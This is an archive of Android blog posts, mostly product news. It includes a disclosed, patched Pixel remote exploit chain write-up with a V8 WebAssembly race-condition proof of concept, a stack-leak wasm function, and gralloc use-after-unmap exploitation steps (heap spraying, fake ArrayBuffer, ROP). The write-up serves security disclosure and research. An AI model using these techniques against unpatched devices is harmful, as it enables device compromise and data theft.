Tag Archives: Android

Use ad content filtering to help improve your users’ ad experience

Cross posted from the AdMob blog.

Optimizing the ad experience on your app for a varied audience can be difficult. Showing users ads that are a better fit can improve their overall ad experience and help maximize your app’s revenue.

AdMob has launched a new feature that allows you to specify the content rating for Google ads served in your app. With the new max_ad_content_rating signal, you can now choose the content rating of Google demand that you want to deliver on a per-request basis.

Four content rating choices offer you the granularity you need to provide users at each level with a better user experience. The four new content rating choices are:

  • G: Content suitable for general audiences
  • PG: Content suitable for most audiences with parental guidance
  • T: Content suitable for teen and older audiences
  • MA: Content suitable only for mature audiences

You can start sending the new max_ad_content_rating signal in the Google Mobile Ads SDK by following these Android and iOS guides. To learn more about the new signal and the content rating choices, visit the AdMob help center or contact your Google account team.

Posted by Alexa Haushalter, Product Manager, AdMob

Huawei to integrate Android Messages across their Android smartphone portfolio

Over the coming months, Huawei will make it even easier for hundreds of millions of people to express themselves via mobile messaging by integrating Android Messages, powered by RCS, across their Android smartphone portfolio.

With Android Messages and RCS messaging, Huawei devices will now offer a richer native messaging and communications experience. Features such as texting over Wi-Fi, rich media sharing, group chats, and typing indicators will now be a default part of the device. Messages from businesses will also be upgraded on Huawei’s devices through RCS business messaging. And Huawei users will be able to make video calls directly from Android Messages through carrier ViLTE and Google Duo.

In addition, to help carriers accelerate deployment of RCS messaging across their networks, we’re collaborating with Huawei to offer the Jibe RCS cloud and hub solution to current and prospective carrier partners, as part of an integrated solution with Huawei's current infrastructure. This will enable a faster process for RCS services so more subscribers can get access to RCS messaging.

Huawei will begin integrating Android Messages across their portfolio in the coming months. For more information, see the following release.

Huawei to integrate Android Messages across their Android smartphone portfolio

Over the coming months, Huawei will make it even easier for hundreds of millions of people to express themselves via mobile messaging by integrating Android Messages, powered by RCS, across their Android smartphone portfolio.

With Android Messages and RCS messaging, Huawei devices will now offer a richer native messaging and communications experience. Features such as texting over Wi-Fi, rich media sharing, group chats, and typing indicators will now be a default part of the device. Messages from businesses will also be upgraded on Huawei’s devices through RCS business messaging. And Huawei users will be able to make video calls directly from Android Messages through carrier ViLTE and Google Duo.

In addition, to help carriers accelerate deployment of RCS messaging across their networks, we’re collaborating with Huawei to offer the Jibe RCS cloud and hub solution to current and prospective carrier partners, as part of an integrated solution with Huawei's current infrastructure. This will enable a faster process for RCS services so more subscribers can get access to RCS messaging.

Huawei will begin integrating Android Messages across their portfolio in the coming months. For more information, see the following release.

Source: Android


Android Security Ecosystem Investments Pay Dividends for Pixel

Posted by the Android Security Team

In June 2017, the Android security team increased the top payouts for the Android Security Rewards (ASR) program and worked with researchers to streamline the exploit submission process. In August 2017, Guang Gong (@oldfresher) of Alpha Team, Qihoo 360 Technology Co. Ltd. submitted the first working remote exploit chain since the ASR program's expansion. For his detailed report, Gong was awarded $105,000, which is the highest reward in the history of the ASR program and $7500 by Chrome Rewards program for a total of $112,500. The complete set of issues was resolved as part of the December 2017 monthly security update. Devices with the security patch level of 2017-12-05 or later are protected from these issues.

All Pixel devices or partner devices using A/B (seamless) system updates will automatically install these updates; users must restart their devices to complete the installation.

The Android Security team would like to thank Guang Gong and the researcher community for their contributions to Android security. If you'd like to participate in Android Security Rewards program, check out our Program rules. For tips on how to submit reports, see Bug Hunter University.

The following article is a guest blog post authored by Guang Gong of Alpha team, Qihoo 360 Technology Ltd.

Technical details of a Pixel remote exploit chain

The Pixel phone is protected by many layers of security. It was the only device that was not pwned in the 2017 Mobile Pwn2Own competition. But in August 2017, my team discovered a remote exploit chain—the first of its kind since the ASR program expansion. Thanks to the Android security team for their responsiveness and help during the submission process.

This blog post covers the technical details of the exploit chain. The exploit chain includes two bugs, CVE-2017-5116 and CVE-2017-14904. CVE-2017-5116 is a V8 engine bug that is used to get remote code execution in sandboxed Chrome render process. CVE-2017-14904 is a bug in Android's libgralloc module that is used to escape from Chrome's sandbox. Together, this exploit chain can be used to inject arbitrary code into system_server by accessing a malicious URL in Chrome. To reproduce the exploit, an example vulnerable environment is Chrome 60.3112.107 + Android 7.1.2 (Security patch level 2017-8-05) (google/sailfish/sailfish:7.1.2/NJH47F/4146041:user/release-keys). 

The RCE bug (CVE-2017-5116)

New features usually bring new bugs. V8 6.0 introduces support for SharedArrayBuffer, a low-level mechanism to share memory between JavaScript workers and synchronize control flow across workers. SharedArrayBuffers give JavaScript access to shared memory, atomics, and futexes. WebAssembly is a new type of code that can be run in modern web browsers— it is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages, such as C/C++, with a compilation target so that they can run on the web. By combining the three features, SharedArrayBuffer WebAssembly, and web worker in Chrome, an OOB access can be triggered through a race condition. Simply speaking, WebAssembly code can be put into a SharedArrayBuffer and then transferred to a web worker. When the main thread parses the WebAssembly code, the worker thread can modify the code at the same time, which causes an OOB access.

The buggy code is in the function GetFirstArgumentAsBytes where the argument args may be an ArrayBuffer or TypedArray object. After SharedArrayBuffer is imported to JavaScript, a TypedArray may be backed by a SharedArraybuffer, so the content of the TypedArray may be modified by other worker threads at any time.

i::wasm::ModuleWireBytes GetFirstArgumentAsBytes(
    const v8::FunctionCallbackInfo<v8::Value>& args, ErrorThrower* thrower) {
  ......
  } else if (source->IsTypedArray()) {    //--->source should be checked if it's backed by a SharedArrayBuffer
    // A TypedArray was passed.
    Local<TypedArray> array = Local<TypedArray>::Cast(source);
    Local<ArrayBuffer> buffer = array->Buffer();
    ArrayBuffer::Contents contents = buffer->GetContents();
    start =
        reinterpret_cast<const byte*>(contents.Data()) + array->ByteOffset();
    length = array->ByteLength();
  } 
  ......
  return i::wasm::ModuleWireBytes(start, start + length);
}

A simple PoC is as follows:

<html>
<h1>poc</h1>
<script id="worker1">
worker:{
       self.onmessage = function(arg) {
        console.log("worker started");
        var ta = new Uint8Array(arg.data);
        var i =0;
        while(1){
            if(i==0){
                i=1;
                ta[51]=0;   //--->4)modify the webassembly code at the same time
            }else{
                i=0;
                ta[51]=128;
            }
        }
    }
}
</script>
<script>
function getSharedTypedArray(){
    var wasmarr = [
        0x00, 0x61, 0x73, 0x6d, 0x01, 0x00, 0x00, 0x00,
        0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f, 0x03,
        0x03, 0x02, 0x00, 0x00, 0x07, 0x12, 0x01, 0x0e,
        0x67, 0x65, 0x74, 0x41, 0x6e, 0x73, 0x77, 0x65,
        0x72, 0x50, 0x6c, 0x75, 0x73, 0x31, 0x00, 0x01,
        0x0a, 0x0e, 0x02, 0x04, 0x00, 0x41, 0x2a, 0x0b,
        0x07, 0x00, 0x10, 0x00, 0x41, 0x01, 0x6a, 0x0b];
    var sb = new SharedArrayBuffer(wasmarr.length);           //---> 1)put WebAssembly code in a SharedArrayBuffer
    var sta = new Uint8Array(sb);
    for(var i=0;i<sta.length;i++)
        sta[i]=wasmarr[i];
    return sta;    
}
var blob = new Blob([
        document.querySelector('#worker1').textContent
        ], { type: "text/javascript" })

var worker = new Worker(window.URL.createObjectURL(blob));   //---> 2)create a web worker
var sta = getSharedTypedArray();
worker.postMessage(sta.buffer);                              //--->3)pass the WebAssembly code to the web worker
setTimeout(function(){
        while(1){
        try{
        sta[51]=0;
        var myModule = new WebAssembly.Module(sta);          //--->4)parse the WebAssembly code
        var myInstance = new WebAssembly.Instance(myModule);
        //myInstance.exports.getAnswerPlus1();
        }catch(e){
        }
        }
    },1000);

//worker.terminate(); 
</script>
</html>

The text format of the WebAssembly code is as follows:

00002b func[0]:
00002d: 41 2a                      | i32.const 42
00002f: 0b                         | end
000030 func[1]:
000032: 10 00                      | call 0
000034: 41 01                      | i32.const 1
000036: 6a                         | i32.add
000037: 0b                         | end

First, the above binary format WebAssembly code is put into a SharedArrayBuffer, then a TypedArray Object is created, using the SharedArrayBuffer as buffer. After that, a worker thread is created and the SharedArrayBuffer is passed to the newly created worker thread. While the main thread is parsing the WebAssembly Code, the worker thread modifies the SharedArrayBuffer at the same time. Under this circumstance, a race condition causes a TOCTOU issue. After the main thread's bound check, the instruction " call 0" can be modified by the worker thread to "call 128" and then be parsed and compiled by the main thread, so an OOB access occurs.

Because the "call 0" Web Assembly instruction can be modified to call any other Web Assembly functions, the exploitation of this bug is straightforward. If "call 0" is modified to "call $leak", registers and stack contents are dumped to Web Assembly memory. Because function 0 and function $leak have a different number of arguments, this results in many useful pieces of data in the stack being leaked.

 (func $leak(param i32 i32 i32 i32 i32 i32)(result i32)
    i32.const 0
    get_local 0
    i32.store
    i32.const 4
    get_local 1
    i32.store
    i32.const 8
    get_local 2
    i32.store
    i32.const 12
    get_local 3
    i32.store
    i32.const 16
    get_local 4
    i32.store
    i32.const 20
    get_local 5
    i32.store
    i32.const 0
  ))

Not only the instruction "call 0" can be modified, any "call funcx" instruction can be modified. Assume funcx is a wasm function with 6 arguments as follows, when v8 compiles funcx in ia32 architecture, the first 5 arguments are passed through the registers and the sixth argument is passed through stack. All the arguments can be set to any value by JavaScript:

/*Text format of funcx*/
 (func $simple6 (param i32 i32 i32 i32 i32 i32 ) (result i32)
    get_local 5
    get_local 4
    i32.add)

/*Disassembly code of funcx*/
--- Code ---
kind = WASM_FUNCTION
name = wasm#1
compiler = turbofan
Instructions (size = 20)
0x58f87600     0  8b442404       mov eax,[esp+0x4]
0x58f87604     4  03c6           add eax,esi
0x58f87606     6  c20400         ret 0x4
0x58f87609     9  0f1f00         nop

Safepoints (size = 8)

RelocInfo (size = 0)

--- End code ---

When a JavaScript function calls a WebAssembly function, v8 compiler creates a JS_TO_WASM function internally, after compilation, the JavaScript function will call the created JS_TO_WASM function and then the created JS_TO_WASM function will call the WebAssembly function. JS_TO_WASM functions use different call convention, its first arguments is passed through stack. If "call funcx" is modified to call the following JS_TO_WASM function.

/*Disassembly code of JS_TO_WASM function */
--- Code ---
kind = JS_TO_WASM_FUNCTION
name = js-to-wasm#0
compiler = turbofan
Instructions (size = 170)
0x4be08f20     0  55             push ebp
0x4be08f21     1  89e5           mov ebp,esp
0x4be08f23     3  56             push esi
0x4be08f24     4  57             push edi
0x4be08f25     5  83ec08         sub esp,0x8
0x4be08f28     8  8b4508         mov eax,[ebp+0x8]
0x4be08f2b     b  e8702e2bde     call 0x2a0bbda0  (ToNumber)    ;; code: BUILTIN
0x4be08f30    10  a801           test al,0x1
0x4be08f32    12  0f852a000000   jnz 0x4be08f62  <+0x42>

The JS_TO_WASM function will take the sixth arguments of funcx as its first argument, but it takes its first argument as an object pointer, so type confusion will be triggered when the argument is passed to the ToNumber function, which means we can pass any values as an object pointer to the ToNumber function. So we can fake an ArrayBuffer object in some address such as in a double array and pass the address to ToNumber. The layout of an ArrayBuffer is as follows:

/* ArrayBuffer layouts 40 Bytes*/                                                                                                                         
Map                                                                                                                                                       
Properties                                                                                                                                                
Elements                                                                                                                                                  
ByteLength                                                                                                                                                
BackingStore                                                                                                                                              
AllocationBase                                                                                                                                            
AllocationLength                                                                                                                                          
Fields                                                                                                                                                    
internal                                                                                                                                                  
internal                                                                                                                                                                                                                                                                                                      


/* Map layouts 44 Bytes*/                                                                                                                                   
static kMapOffset = 0,                                                                                                                                    
static kInstanceSizesOffset = 4,                                                                                                                          
static kInstanceAttributesOffset = 8,                                                                                                                     
static kBitField3Offset = 12,                                                                                                                             
static kPrototypeOffset = 16,                                                                                                                             
static kConstructorOrBackPointerOffset = 20,                                                                                                              
static kTransitionsOrPrototypeInfoOffset = 24,                                                                                                            
static kDescriptorsOffset = 28,                                                                                                                           
static kLayoutDescriptorOffset = 1,                                                                                                                       
static kCodeCacheOffset = 32,                                                                                                                             
static kDependentCodeOffset = 36,                                                                                                                         
static kWeakCellCacheOffset = 40,                                                                                                                         
static kPointerFieldsBeginOffset = 16,                                                                                                                    
static kPointerFieldsEndOffset = 44,                                                                                                                      
static kInstanceSizeOffset = 4,                                                                                                                           
static kInObjectPropertiesOrConstructorFunctionIndexOffset = 5,                                                                                           
static kUnusedOffset = 6,                                                                                                                                 
static kVisitorIdOffset = 7,                                                                                                                              
static kInstanceTypeOffset = 8,     //one byte                                                                                                            
static kBitFieldOffset = 9,                                                                                                                               
static kInstanceTypeAndBitFieldOffset = 8,                                                                                                                
static kBitField2Offset = 10,                                                                                                                             
static kUnusedPropertyFieldsOffset = 11

Because the content of the stack can be leaked, we can get many useful data to fake the ArrayBuffer. For example, we can leak the start address of an object, and calculate the start address of its elements, which is a FixedArray object. We can use this FixedArray object as the faked ArrayBuffer's properties and elements fields. We have to fake the map of the ArrayBuffer too, luckily, most of the fields of the map are not used when the bug is triggered. But the InstanceType in offset 8 has to be set to 0xc3(this value depends on the version of v8) to indicate this object is an ArrayBuffer. In order to get a reference of the faked ArrayBuffer in JavaScript, we have to set the Prototype field of Map in offset 16 to an object whose Symbol.toPrimitive property is a JavaScript call back function. When the faked array buffer is passed to the ToNumber function, to convert the ArrayBuffer object to a Number, the call back function will be called, so we can get a reference of the faked ArrayBuffer in the call back function. Because the ArrayBuffer is faked in a double array, the content of the array can be set to any value, so we can change the field BackingStore and ByteLength of the faked array buffer to get arbitrary memory read and write. With arbitrary memory read/write, executing shellcode is simple. As JIT Code in Chrome is readable, writable and executable, we can overwrite it to execute shellcode.

Chrome team fixed this bug very quickly in chrome 61.0.3163.79, just a week after I submitted the exploit.

The EoP Bug (CVE-2017-14904)

The sandbox escape bug is caused by map and unmap mismatch, which causes a Use-After-Unmap issue. The buggy code is in the functions gralloc_map and gralloc_unmap:

static int gralloc_map(gralloc_module_t const* module,
                       buffer_handle_t handle)
{ ……
    private_handle_t* hnd = (private_handle_t*)handle;
    ……
    if (!(hnd->flags & private_handle_t::PRIV_FLAGS_FRAMEBUFFER) &&
        !(hnd->flags & private_handle_t::PRIV_FLAGS_SECURE_BUFFER)) {
        size = hnd->size;
        err = memalloc->map_buffer(&mappedAddress, size,
                                       hnd->offset, hnd->fd);        //---> mapped an ashmem and get the mapped address. the ashmem fd and offset can be controlled by Chrome render process.
        if(err || mappedAddress == MAP_FAILED) {
            ALOGE("Could not mmap handle %p, fd=%d (%s)",
                  handle, hnd->fd, strerror(errno));
            return -errno;
        }
        hnd->base = uint64_t(mappedAddress) + hnd->offset;          //---> save mappedAddress+offset to hnd->base
    } else {
        err = -EACCES;
}
……
    return err;
}

gralloc_map maps a graphic buffer controlled by the arguments handle to memory space and gralloc_unmap unmaps it. While mapping, the mappedAddress plus hnd->offset is stored to hnd->base, but while unmapping, hnd->base is passed to system call unmap directly minus the offset. hnd->offset can be manipulated from a Chrome's sandboxed process, so it's possible to unmap any pages in system_server from Chrome's sandboxed render process.

static int gralloc_unmap(gralloc_module_t const* module,
                         buffer_handle_t handle)
{
  ……
    if(hnd->base) {
        err = memalloc->unmap_buffer((void*)hnd->base, hnd->size, hnd->offset);    //---> while unmapping, hnd->offset is not used, hnd->base is used as the base address, map and unmap are mismatched.
        if (err) {
            ALOGE("Could not unmap memory at address %p, %s", (void*) hnd->base,
                    strerror(errno));
            return -errno;
        }
        hnd->base = 0;
}
……
    return 0;
}

int IonAlloc::unmap_buffer(void *base, unsigned int size,
        unsigned int /*offset*/)                              
//---> look, offset is not used by unmap_buffer
{
    int err = 0;
    if(munmap(base, size)) {
        err = -errno;
        ALOGE("ion: Failed to unmap memory at %p : %s",
              base, strerror(errno));
    }
    return err;
}

Although SeLinux restricts the domain isolated_app to access most of Android system service, isolated_app can still access three Android system services.

52neverallow isolated_app {
53    service_manager_type
54    -activity_service
55    -display_service
56    -webviewupdate_service
57}:service_manager find;

To trigger the aforementioned Use-After-Unmap bug from Chrome's sandbox, first put a GraphicBuffer object, which is parseable into a bundle, and then call the binder method convertToTranslucent of IActivityManager to pass the malicious bundle to system_server. When system_server handles this malicious bundle, the bug is triggered.

This EoP bug targets the same attack surface as the bug in our 2016 MoSec presentation, A Way of Breaking Chrome's Sandbox in Android. It is also similar to Bitunmap, except exploiting it from a sandboxed Chrome render process is more difficult than from an app. 

To exploit this EoP bug:

1. Address space shaping. Make the address space layout look as follows, a heap chunk is right above some continuous ashmem mapping:

7f54600000-7f54800000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f58000000-7f54a00000 rw-s 001fe000 00:04 32783         /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781         /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779         /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777         /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775         /dev/ashmem/360alpha25 (deleted)
......

2. Unmap part of the heap (1 KB) and part of an ashmem memory (2MB–1KB) by triggering the bug:

7f54400000-7f54600000 rw-s 00000000 00:04 31603         /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
//--->There is a 2MB memory gap
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

3. Fill the unmapped space with an ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603      /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0         [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605       /dev/ashmem/360alpha1001 (deleted)  
//--->The gap is filled with the ashmem memory 360alpha1001
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783      /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781      /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779      /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777      /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775      /dev/ashmem/360alpha25 (deleted)

4. Spray the heap and the heap data will be written to the ashmem memory:

7f54400000-7f54600000 rw-s 00000000 00:04 31603        /dev/ashmem/360alpha1000 (deleted)
7f54600000-7f547ff000 rw-p 00000000 00:00 0           [anon:libc_malloc]
7f547ff000-7f549ff000 rw-s 00000000 00:04 31605          /dev/ashmem/360alpha1001 (deleted)
//--->the heap manager believes the memory range from 0x7f547ff000 to 0x7f54800000 is still mongered by it and will allocate memory from this range, result in heap data is written to ashmem memory
7f549ff000-7f54a00000 rw-s 001fe000 00:04 32783        /dev/ashmem/360alpha29 (deleted)
7f54a00000-7f54c00000 rw-s 00000000 00:04 32781        /dev/ashmem/360alpha28 (deleted)
7f54c00000-7f54e00000 rw-s 00000000 00:04 32779        /dev/ashmem/360alpha27 (deleted)
7f54e00000-7f55000000 rw-s 00000000 00:04 32777        /dev/ashmem/360alpha26 (deleted)
7f55000000-7f55200000 rw-s 00000000 00:04 32775        /dev/ashmem/360alpha25 (deleted)

5. Because the filled ashmem in step 3 is mapped both by system_server and render process, part of the heap of system_server can be read and written by render process and we can trigger system_server to allocate some GraphicBuffer object in ashmem. As GraphicBuffer is inherited from ANativeWindowBuffer, which has a member named common whose type is android_native_base_t, we can read two function points (incRef and decRef) from ashmem memory and then can calculate the base address of the module libui. In the latest Pixel device, Chrome's render process is still 32-bit process but system_server is 64-bit process. So we have to leak some module's base address for ROP. Now that we have the base address of libui, the last step is to trigger ROP. Unluckily, it seems that the points incRef and decRef haven't been used. It's impossible to modify it to jump to ROP, but we can modify the virtual table of GraphicBuffer to trigger ROP.

typedef struct android_native_base_t
{
    /* a magic value defined by the actual EGL native type */
    int magic;

    /* the sizeof() of the actual EGL native type */
    int version;

    void* reserved[4];

    /* reference-counting interface */
    void (*incRef)(struct android_native_base_t* base);
    void (*decRef)(struct android_native_base_t* base);
} android_native_base_t;

6.Trigger a GC to execute ROP

When a GraphicBuffer object is deconstructed, the virtual function onLastStrongRef is called, so we can replace this virtual function to jump to ROP. When GC happens, the control flow goes to ROP. Finding an ROP chain in limited module(libui) is challenging, but after hard work, we successfully found one and dumped the contents of the file into /data/misc/wifi/wpa_supplicant.conf .

Summary

The Android security team responded quickly to our report and included the fix for these two bugs in the December 2017 Security Update. Supported Google device and devices with the security patch level of 2017-12-05 or later address these issues. While parsing untrusted parcels still happens in sensitive locations, the Android security team is working on hardening the platform to mitigate against similar vulnerabilities.

The EoP bug was discovered thanks to a joint effort between 360 Alpha Team and 360 C0RE Team. Thanks very much for their effort.

Meet the finalists of the Google Play Indie Games Contest in Europe

Posted by Adriana Puchianu, Developer Marketing Google Play

Back in October we launched the 2nd edition of the Google Play Indie Games Contest in Europe, with the aim to identify, showcase and reward indie gaming talent from more than 30 countries. We were amazed by the innovation and creativity that indie developers from the region have to offer.

Selecting just 20 finalists has once again been a huge challenge. We had a lot of fun playing the games that will go on to showcase at the Saatchi Gallery on February 13th in London. Without further ado, we are happy to announce the Top 20 finalists of this year's edition. Congratulations to the finalists and thanks to everyone else who has entered the contest.

A Planet of Mine
Tuesday Quest
France

Bridge Constructor Portal
ClockStone Softwareentwicklung GmbH
Austria

Bury me, my Love
Playdius
France

Captain Tom Galactic Traveler
Picodongames
France

Core
FURYJAM
Russia

Flat Pack
Nitrome
United Kingdom

Fern Flower
Macaque
Poland

I Love Hue
Zut!
United Kingdom

Jodeo
Gamebra.in
Turkey

Kami 2
State of Play
United Kingdom

Kenshō
FIFTYTWO
Russia

No More Buttons
Tommy Søreide Kjær
Norway

Old Man's Journey
Broken Rules Interactive Media GmbH
Austria

The Big Journey
Catfishbox
Ukraine

The House of Da Vinci
Blue Brain Games, s.r.o.
Slovakia

The Office Quest
11Sheep
Israel

Unbalance
TVEE
Turkey

Undervault
Andriy Bychkovskyi
Ukraine

yellow
Bart Bonte
Belgium

Check out the prizes

All the 20 finalists are getting:

  • A paid trip to London to showcase their game at the Final held at Saatchi Gallery
  • Inclusion of their game on a promotional billboard in London for 1 month
  • Inclusion of their game in a dedicated Indie Games Contest collection on the Indie Corner for one month in more than 40 countries across EMEA
  • Two (2) tickets to attend a 2018 Playtime event, an invitation-only event for top apps and games developers on Google Play
  • One (1) Pixel 2 device

They will also have the chance to win more prizes at the final event.

Join the Google Play team and the finalists at the final event:

Anyone can now register to attend the final showcase event for free at the Saatchi Gallery in London on 13 February 2018. Come and play some great games and have fun with indie developers, industry experts, and the Google Play team.

How useful did you find this blogpost?

Faster Renewals for Test Subscriptions

Testing your in-app subscriptions is a critical step in ensuring you're offering your customers a high quality service.

In order to make testing easier and faster, starting on February 20th, we are introducing shorter renewal intervals for test purchases made with license-test accounts. Currently, subscriptions by license-test accounts renew daily. The new changes will allow you to test an entire subscription cycle, including 6 renewals, in under an hour. We will also be shortening the testing time intervals of features such as grace period and account hold.

Please be aware that these changes are coming so you can update your testing flows accordingly prior to the change. Also note that existing test subscriptions still active on February 20, 2018 will automatically be canceled at that time.

Renewal times

Renewal times will vary based on the subscription period:

Subscription period Test subscription period
1 week 5 minutes
1 month 5 minutes
3 month 10 minutes
6 month 15 minutes
1 year 30 minutes

Time intervals of the following features will also be shortened for test subscriptions:

Feature Test period
Free trial 3 minutes
Introductory price period Same as test subscription period
Grace period (both 3 and 7 day) 5 minutes
Account hold 10 minutes

Note: These times are approximate; you may see some small variations in the precise time of an event. To compensate for variation, call the Google Play Developer API to view current status after every subscription expiration date.

Renewal limit

Due to the increase in renewal frequency, the number of renewals is limited to 6 regular renewals (not including intro price/free trial). After 6 renewals, the subscription will be automatically canceled.

Examples

Here are several examples of how the new renewal times are applied.

Free trial

Grace period

Account hold

Don't forget to check the Testing In-app Billing page for more details on testing your subscriptions. If you still have questions, reach out through the comments or post your question on Stackoverflow using the tag google-play.

Android Excellence: congratulations to the newly added apps and games

Posted by Kacey Fahey, Developer Marketing, Google Play

Kicking off the new year, we're excited to welcome our latest group of Android Excellence apps and games. These awardees represent some of the best experiences and top performing apps and games on the Play Store and can be found with other great selections on the Editors' Choice page.

If you're looking for some new apps, below are a few highlights.

  • EyeEm: A great photo editor app with a full suite of filters and tools to make your pictures shine. Learn style tips from their community and even sell your images through the EyeEm marketplace.
  • Musixmatch: Check out Musixmatch's updated app while learning the lyrics to all your favorite songs. The app is compatible with many of the top music streaming services and you can even follow along with your Android Wear device or on the big screen with Chromecast support.
  • ViewRanger: Plan your next hiking adventure by discovering new routes and trail guides with ViewRanger. Check out the Skyline feature using your phone's camera to identify over 9 million sites across the world through augmented reality.

Here are a few of our favorite new games joining the collection.

  • Fire Emblem Heroes: Nintendo's popular strategy-RPG franchise is now reimagined for mobile. Fight battles, develop your heroes' skills, and try various gameplay modes for hours of exciting gameplay.
  • Lumino City: Explore the charming papercraft style world in this award-winning puzzle adventure game. The beautiful scenery is all handcrafted.
  • Old Man's Journey: Gorgeous scenery, an immersive soundtrack, and deep emotion help you uncover the old man's life stories while you solve puzzles and shape the landscape to determine his future.

Congratulations to the newly added Android Excellence apps and games.

New Android Excellence apps New Android Excellence games
1tap

Acorns

Airbnb

Blink Health

Blinkist

Clue

Ditty

EyeEm

Fabulous

IFTTT

iReader

Journey

KKBOX

LinkedIn

Mobills: Budget Planner

Musixmatch

Shpock

Stocard

Video Editor

ViewRanger

YAZIO

YOP

Agent A

Bit Heroes

Bloons Supermonkey 2

Dancing Line

DEAD WARFARE: Zombie

Dragon Project

Fire Emblem Heroes

Futurama: Worlds of Tomorrow

Idle Heroes

Last Day on Earth: Survival

Lords Mobile

Lumino City

Modern Combat Versus

Old Man's Journey

The Walking Dead No Man's Land

War Wings

Explore other great apps and games in the Editors' Choice section on Google Play and discover best practices to help you build quality apps and games for people to love.

How useful did you find this blogpost?

New devices and more: what’s in store for the Google Assistant this year

The Google Assistant is your personal Google. It lets you have a conversation and ask about everything under the sun and, best of all, it’s available wherever you need help—at home or on the go. Over the past year, we've been working to bring the Assistant to more devices in more places and now it's available on more than 400 million devices.

Tuesday marks the start of the Consumer Electronics Show in Las Vegas, NV, and we'll be there to showcase some of the exciting stuff we have in store for 2018. So if you’re at CES, stop on by the Google Assistant Playground (Central Plaza-21). Here we go!

At home

The Google Assistant gives you an easy, hands-free way to control your home, whether it’s helping you dim the lights from the comfort of your couch or play your dinner party playlist. It's already lending a helping hand in speakers like Google Home, Mini and Max. In fact, we’ve sold more than one Google Home every second since Google Home Mini started shipping in October. And with so much excitement around speakers, we’re making the Assistant even more available—this week we’re announcing that the Assistant is coming to new voice-activated speakers from Altec Lansing, Anker Innovations, Bang & Olufsen, Braven, iHome, JBL, Jensen, LG, Klipsch, Knit Audio, Memorex, RIVA Audio and SōLIS.

But there are also moments when a screen would make the Assistant even more helpful, like when you need to learn how to cut a pineapple, and the best way is to watch a video. Today, we're announcing that the Assistant is coming to smart displays. These new devices have the Google Assistant built in, and with the added benefit of a touch screen, they can help you get even more done. You can watch videos from YouTube, video call with Google Duo, find photos from Google Photos and more. You can also get recommendations for your favorite content, right on the home screen.

Starting later this year, the Assistant is coming to new smart displays from four companies, including JBL, Lenovo, LG and Sony. To learn more about how smart displays were built, visit the Android Developers blog.

Assistant on smart display

Last year we brought the Assistant to Android TV devices including NVIDIA's SHIELD TV and Sony’s Android TVs, so you can find the latest blockbuster, stock up on snacks with Google Express and set the perfect movie watching mood lighting. We will continue to roll out the Assistant to existing Android TVs such as AirTV Player, Bouygues Telecom, LG U+, TCL, Skyworth and Xiaomi. And, this week, Changhong, Element, Funai, Haier, Hisense and Westinghouse are announcing new Android TVs with the Google Assistant. Plus, we've worked closely with LG to integrate the Assistant into the new line of LG TVs in the coming months.

And, across all your devices, the Google Assistant is making your home even smarter. The Assistant now works with over 225 home control brands and more than 1,500 devices, including a bunch of new ones from Abode, Crestron, Gourmia, Insteon, Kohler and Yonomi. With these integrations, millions of new smart home devices are being connected to the Assistant every month, so you can stay in control, whether you want to heat up the house, check on the laundry or make sure you locked the back door.

On your phone and headphones

The Google Assistant is available on your Android phone, iPhone, and headphones, helping you when you're on the go. And this week we're announcing that over the coming year, more headphones are on the way from Jaybird, JBL, LG and Sony. These headphones are optimized for the Google Assistant; once you pair them to your phone, you can talk to the Assistant instantly with just the touch of an earbud, whether you want to skip a track to hear the next song, get notifications, or hear and respond to your messages.

In your car

The Assistant can also help you in the car, so that you can keep your hands on the wheel and eyes on the road. Starting this week in the U.S., the Assistant is coming to Android Auto.

Android Auto is available in tens of millions of cars on more than 400 models from 40+ brands, including Ford, General Motors, Nissan, Volkswagen and Volvo. With the Assistant in Android Auto, you can listen to your playlists from apps like Spotify or Google Play Music, get quick directions from Google Maps or Waze, and send or receive messages from services like WhatsApp. And soon, you’ll be able to reserve a parking space with SpotHero or order your favorite handcrafted drink or food from Starbucks—all from the road.

Assistant on Android auto

You can use the Assistant in Android Auto on your car display by connecting your Android phone to a supported car—or you can use it on your phone screen in any car. And we're working with auto makers to integrate the Assistant directly into their cars—no phone required.

With the Assistant on your phone, speaker or TV, you can also check your fuel level, lock doors, and more. This feature is already available on cars from BMW, Mercedes-Benz and Hyundai—and today we're announcing that it'll be coming to cars from Kia and Fiat Chrysler Automobiles.

Always ready to help

Since the Assistant can do so many things, we're introducing a new way to talk about them. We’re calling them Actions. Actions include features built by Google—like directions on Google Maps—and those that come from developers, publishers and other third parties, like working out with Fitbit Coach. So finding photos with Google Photos would be one Action while meditating with Headspace would be another. All in all, today there are more than a million Actions you can take with your Assistant.

